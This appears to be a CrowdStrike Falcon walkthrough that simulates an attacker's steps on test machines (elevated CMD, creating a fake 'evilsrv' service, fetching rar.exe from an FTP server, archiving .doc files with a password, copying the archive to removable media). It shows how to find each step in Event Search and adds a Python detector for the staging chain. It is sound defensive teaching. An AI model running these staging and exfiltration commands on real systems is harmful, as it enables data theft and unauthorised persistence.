Five Second Enterprise Visibility
Introduction
Visibility is an essential element in next generation endpoint protection.
In this article we'll run through a series of commands that might be used in any number of attacks. We'll then highlight ways to identify these commands in the Falcon user interface, demonstrating how quickly detailed information is available to the security admin.
The CrowdStrike Solution
While legacy endpoint security products were limited to either blocking or allowing an activity, next generation endpoint protection products add the ability to record activity on the endpoint and store it in a database for future search and investigation. While this may sound like a simple concept, there are actually vast differences in the way that this can be implemented.
CrowdStrike delivers superior visibility as a result of its unique architecture. The key points to know about this architecture are:
- The Falcon sensor does more than just record and store events. It puts events in context. It is trivial to simply record events and dump them into a database. This creates a garbage-in-garbage-out scenario for admins that ends up wasting time and driving up infrastructure costs. The Falcon platform takes a different approach. It actually links related events together to paint an accurate picture of the state of the machine. It then displays that picture to the admin (rather than a stream of unrelated events). Understanding individual events as part of a broader process tree allows the sensor to then apply security logic derived from CrowdStrike intelligence. If a sequence of events matches a known indicator of attack, the Falcon sensor will identify the activity as malicious, send a detection alert to the administrator and also block the threat.
- Events recorded by the Falcon sensor are streamed to the cloud and stored in a graph database. This approach ensures that data is accessible to the administrator even if some systems are offline at the time of the search. It also ensures reliability, speed, and scalability. The CrowdStrike graph database – known as the Threat Graph – is designed to quickly return results for all queries, regardless of the size or the amount of data in the database.
This architecture allows Falcon Endpoint Protection to provide deep visibility across your entire environment in five seconds or less.
Step-By-Step Procedure
These scenarios will show the speed at which those events can be searched from the Falcon Investigate App → Event Search. These use cases represent a tiny subset of the events that are recorded and made searchable. Please contact us to learn about all of our visibility and search capabilities.
Step 1
Go to the CrowdStrike Falcon Endpoint Protection login page and log in.
Step 2
Navigate to the Event Search page by going to Investigate, then “Event Search”.
Step 3
Switch to Test System 1 and start Remote Desktop connection to Test System 2. This remote connection will be recorded by Falcon.
You can search for this activity in the Events App by entering the following search, where hostname is the name of the test system: ComputerName=hostname IoSessionConnected
The results will show that the connection occurred and also provide contextual details of the connection.
Step 4
Return to the RDP session and choose to run the Windows Command Prompt as Administrator. When prompted, choose Yes to the User Account Control (UAC) prompt.
Return to the Events App and enter the following search: ComputerName=hostname UACExeElevation
The results will show that CMD started, but it will also show the contextual events around the execution along with the details of the UAC elevation.
Step 5
Return to the RDP session and type “whoami” in the Windows Command Prompt.
Go back to the Events App and enter the following search: ComputerName=hostname whoami
The results show that the Falcon sensor not only sees that CMD started but also sees the command activity within it. Similarly, you can search for activity by user with the following search: ComputerName=hostname UserIdentity
Step 6
Return to the RDP session and type “powershell” in the Windows Command Prompt. Running the next few commands from PowerShell inside a Windows Command Prompt obfuscates many of the activities from other tools (a common attacker technique). However, Falcon can see through this obfuscation technique.
In CMD change directory to the desktop and then type “mkdir exfil”.
This creates a folder for us to stage data that we will later attempt to exfiltrate.
Go back to the Events App and enter the following search: ComputerName=hostname DirectoryCreate
We can immediately see the creation of the new directory.
Step 7
Return to the RDP session. In CMD change directory to the exfil directory. Then type: New-Service -name evilsrv -DisplayName "Evil Service" -BinaryPathName C:\Windows\System32\PING.EXE
Go back to the Events App and enter the following search: ComputerName=hostname CreateService
The results tell us that a service was created, but they also show us all of the context around the service; for example, they tell us that its purpose is to launch PING.EXE.
THE FOLLOWING STEPS REQUIRE AN FTP SERVER AND A RAR UTILITY
Step 8
Return to the RDP session. Download a RAR utility from an FTP server in CMD with a command like: Invoke-WebRequest -uri ftp://ftpserver/Rar.exe -OutFile rar.exe
Go to Events App and see that the RAR utility was written with the following search: ComputerName=hostname PeFileWritten
Return to the RDP session. Add all .doc files to a password-protected RAR archive in CMD with a command like: .\rar.exe a -hpPassword exfil.rar ..\*.doc
Go to Event Search and see that the data was archived with the following search: ComputerName=hostname RarFileWritten
You can also get the details of the archive utility with the following search: ComputerName=hostname rar.exe
The critical thing to know about this data preparation phase is that it was all done inside an existing PowerShell process. This obfuscation technique makes the FTP and RAR activity invisible to most tools, but Falcon can still see it. In fact, Falcon can even detect when an attacker tries to hide an archive file by giving it a benign extension like .txt. This is true because Falcon doesn't simply look at the file extension; instead, it looks at the entire sequence of events. In this example, it can see that an archiving utility was used to create the file before it was renamed to .txt.
Step 9
Falcon can also see removable media activity. To proceed, insert removable media to your test system or mount removable media to your VM. Go to Events App and see that removable media was mounted with the following search: ComputerName=hostname FsVolumeMounted
To continue our data exfiltration example, go to CMD and type: copy .\exfil.rar e:\
This copies the archived data to the removable media device. To see this, return to the Events App and enter the following search: ComputerName=hostname CommandHistory
These search results include all commands executed on the system. This is a quick and easy way to see attacker activity because attackers typically prefer to use command line interfaces. In this example, you can see the entire attack chain summarized in one simple event.
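To make the "events in context" idea from The CrowdStrike Solution section concrete using the walkthrough's own event names, here is an added example; it is not CrowdStrike code and does not show how the Falcon sensor or the Threat Graph is implemented. It links constructed events into a per-host process tree and raises one finding only when the staging chain from Steps 6 to 9 (DirectoryCreate, PeFileWritten, RarFileWritten, then a copy of that archive to a mounted volume) occurs inside a single process lineage, following the archive through the rename to .txt that Step 8 describes. The sample events, the field names (ts, host, pid, ppid, image, detail) and the ProcessStart and FileRenamed event names are assumptions of this example.

```python
"""Events-in-context toy detector (added example, not CrowdStrike code)."""
from collections import defaultdict

# Constructed sample events (not real sensor output). Event names other than
# ProcessStart and FileRenamed come from the walkthrough; all field names are assumed.
EVENTS = [
    {"ts": 1, "host": "TEST2", "event": "IoSessionConnected", "pid": 0, "ppid": 0, "detail": "RDP from TEST1"},
    {"ts": 2, "host": "TEST2", "event": "ProcessStart", "pid": 400, "ppid": 0, "image": "cmd.exe"},
    {"ts": 3, "host": "TEST2", "event": "UACExeElevation", "pid": 400, "ppid": 0, "detail": "cmd.exe elevated"},
    {"ts": 4, "host": "TEST2", "event": "ProcessStart", "pid": 500, "ppid": 400, "image": "powershell.exe"},
    {"ts": 5, "host": "TEST2", "event": "DirectoryCreate", "pid": 500, "ppid": 400, "detail": r"C:\Users\a\Desktop\exfil"},
    {"ts": 6, "host": "TEST2", "event": "CreateService", "pid": 500, "ppid": 400, "detail": "evilsrv -> PING.EXE"},
    {"ts": 7, "host": "TEST2", "event": "PeFileWritten", "pid": 500, "ppid": 400, "detail": r"C:\Users\a\Desktop\exfil\rar.exe"},
    {"ts": 8, "host": "TEST2", "event": "ProcessStart", "pid": 600, "ppid": 500, "image": "rar.exe"},
    {"ts": 9, "host": "TEST2", "event": "RarFileWritten", "pid": 600, "ppid": 500, "detail": r"C:\Users\a\Desktop\exfil\exfil.rar"},
    # The archive gets a benign-looking extension before it is moved.
    {"ts": 10, "host": "TEST2", "event": "FileRenamed", "pid": 500, "ppid": 400,
     "detail": r"C:\Users\a\Desktop\exfil\exfil.rar -> C:\Users\a\Desktop\exfil\notes.txt"},
    {"ts": 11, "host": "TEST2", "event": "FsVolumeMounted", "pid": 0, "ppid": 0, "detail": "E:"},
    {"ts": 12, "host": "TEST2", "event": "CommandHistory", "pid": 500, "ppid": 400,
     "detail": "copy C:\\Users\\a\\Desktop\\exfil\\notes.txt E:\\"},
    # Same event names on another host with no shared lineage: must not fire.
    {"ts": 13, "host": "TEST9", "event": "DirectoryCreate", "pid": 700, "ppid": 1, "detail": r"C:\build\out"},
    {"ts": 14, "host": "TEST9", "event": "RarFileWritten", "pid": 800, "ppid": 1, "detail": r"C:\backup\weekly.rar"},
]


def build_tree(events):
    """Attach each event to its process and each process to its parent, per host."""
    procs, children = {}, defaultdict(list)
    for e in sorted(events, key=lambda ev: ev["ts"]):
        node = procs.setdefault((e["host"], e["pid"]), {"image": "?", "ppid": e["ppid"], "events": []})
        if "image" in e:
            node["image"] = e["image"]
        node["events"].append(e)
    for (host, pid), node in procs.items():
        if pid != node["ppid"]:  # pid 0 is the host-level pseudo-process, not a child of itself
            children[(host, node["ppid"])].append(pid)
    return procs, children


def lineage(procs, host, pid):
    """Process chain from the session root down to pid, e.g. 'cmd.exe > powershell.exe'."""
    chain = []
    while pid != 0 and (host, pid) in procs:
        chain.append(procs[(host, pid)]["image"])
        pid = procs[(host, pid)]["ppid"]
    return " > ".join(reversed(chain))


def subtree_events(procs, children, host, root_pid):
    """Events of root_pid and every descendant process, in time order."""
    out, stack = [], [root_pid]
    while stack:
        pid = stack.pop()
        out.extend(procs.get((host, pid), {"events": []})["events"])
        stack.extend(children.get((host, pid), []))
    return sorted(out, key=lambda ev: ev["ts"])


def mounted_volumes(procs, host):
    """(drive letter, mount time) pairs reported by FsVolumeMounted on this host."""
    host_events = procs.get((host, 0), {"events": []})["events"]
    return [(e["detail"].lower(), e["ts"]) for e in host_events if e["event"] == "FsVolumeMounted"]


def match_chain(events, volumes):
    """Return the evidence chain if this lineage stages data and copies the archive
    to a volume mounted earlier (following renames), else None."""
    wanted = ["DirectoryCreate", "PeFileWritten", "RarFileWritten"]
    stage, evidence, archives = 0, [], set()
    for e in events:
        name = e["event"]
        if stage < len(wanted) and name == wanted[stage]:
            stage += 1
            evidence.append(e)
            if name == "RarFileWritten":
                archives.add(e["detail"].lower())
        elif stage == len(wanted) and name == "FileRenamed":
            src, dst = (p.strip().lower() for p in e["detail"].split("->"))
            if src in archives:  # keep tracking the archive under its new name, whatever the extension
                archives.remove(src)
                archives.add(dst)
                evidence.append(e)
        elif stage == len(wanted) and name == "CommandHistory":
            cmd = e["detail"].lower()
            if (cmd.startswith("copy ") and any(a in cmd for a in archives)
                    and any(v + "\\" in cmd and ts < e["ts"] for v, ts in volumes)):
                evidence.append(e)
                return evidence
    return None


def detect_staging(events):
    """One finding per tightest process lineage that completes the whole chain."""
    procs, children = build_tree(events)
    matches = {}
    for host, pid in procs:
        if pid == 0:
            continue
        evidence = match_chain(subtree_events(procs, children, host, pid), mounted_volumes(procs, host))
        if evidence:
            matches[(host, pid)] = evidence
    return [
        {"host": h, "pid": p, "lineage": lineage(procs, h, p), "evidence": ev}
        for (h, p), ev in matches.items()
        if not any((h, c) in matches for c in children.get((h, p), []))
    ]


if __name__ == "__main__":
    for f in detect_staging(EVENTS):
        print(f"{f['host']} {f['lineage']} (pid {f['pid']})")
        for e in f["evidence"]:
            print(f"  ts={e['ts']:>2} {e['event']:<16} {e['detail']}")
```

Run as a script it prints a single finding for TEST2 with the lineage cmd.exe > powershell.exe and the five events that make up the chain. Drop the FileRenamed event and the copy of notes.txt no longer ties back to the archive, so nothing fires; drop FsVolumeMounted and the copy is no longer to removable media, so nothing fires either. The events on TEST9 use the same names but never share a lineage, which is the difference between a stream of unrelated events and a process tree.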
Conclusion
CrowdStrike Falcon® Endpoint Protection makes it quick and easy to get visibility across your entire organization. The solution is SaaS-based and built on a graph database. This means that administrators get unlimited scalability without any need to invest in on-premise hardware. More importantly, it means that administrators can always get immediate responses to their queries – regardless of deployment size. This document showed a small subset of the events that Falcon captures, and also showed how quickly they can be searched for in the Events App. CrowdStrike is continually adding additional visibility features, so please contact us for the latest information.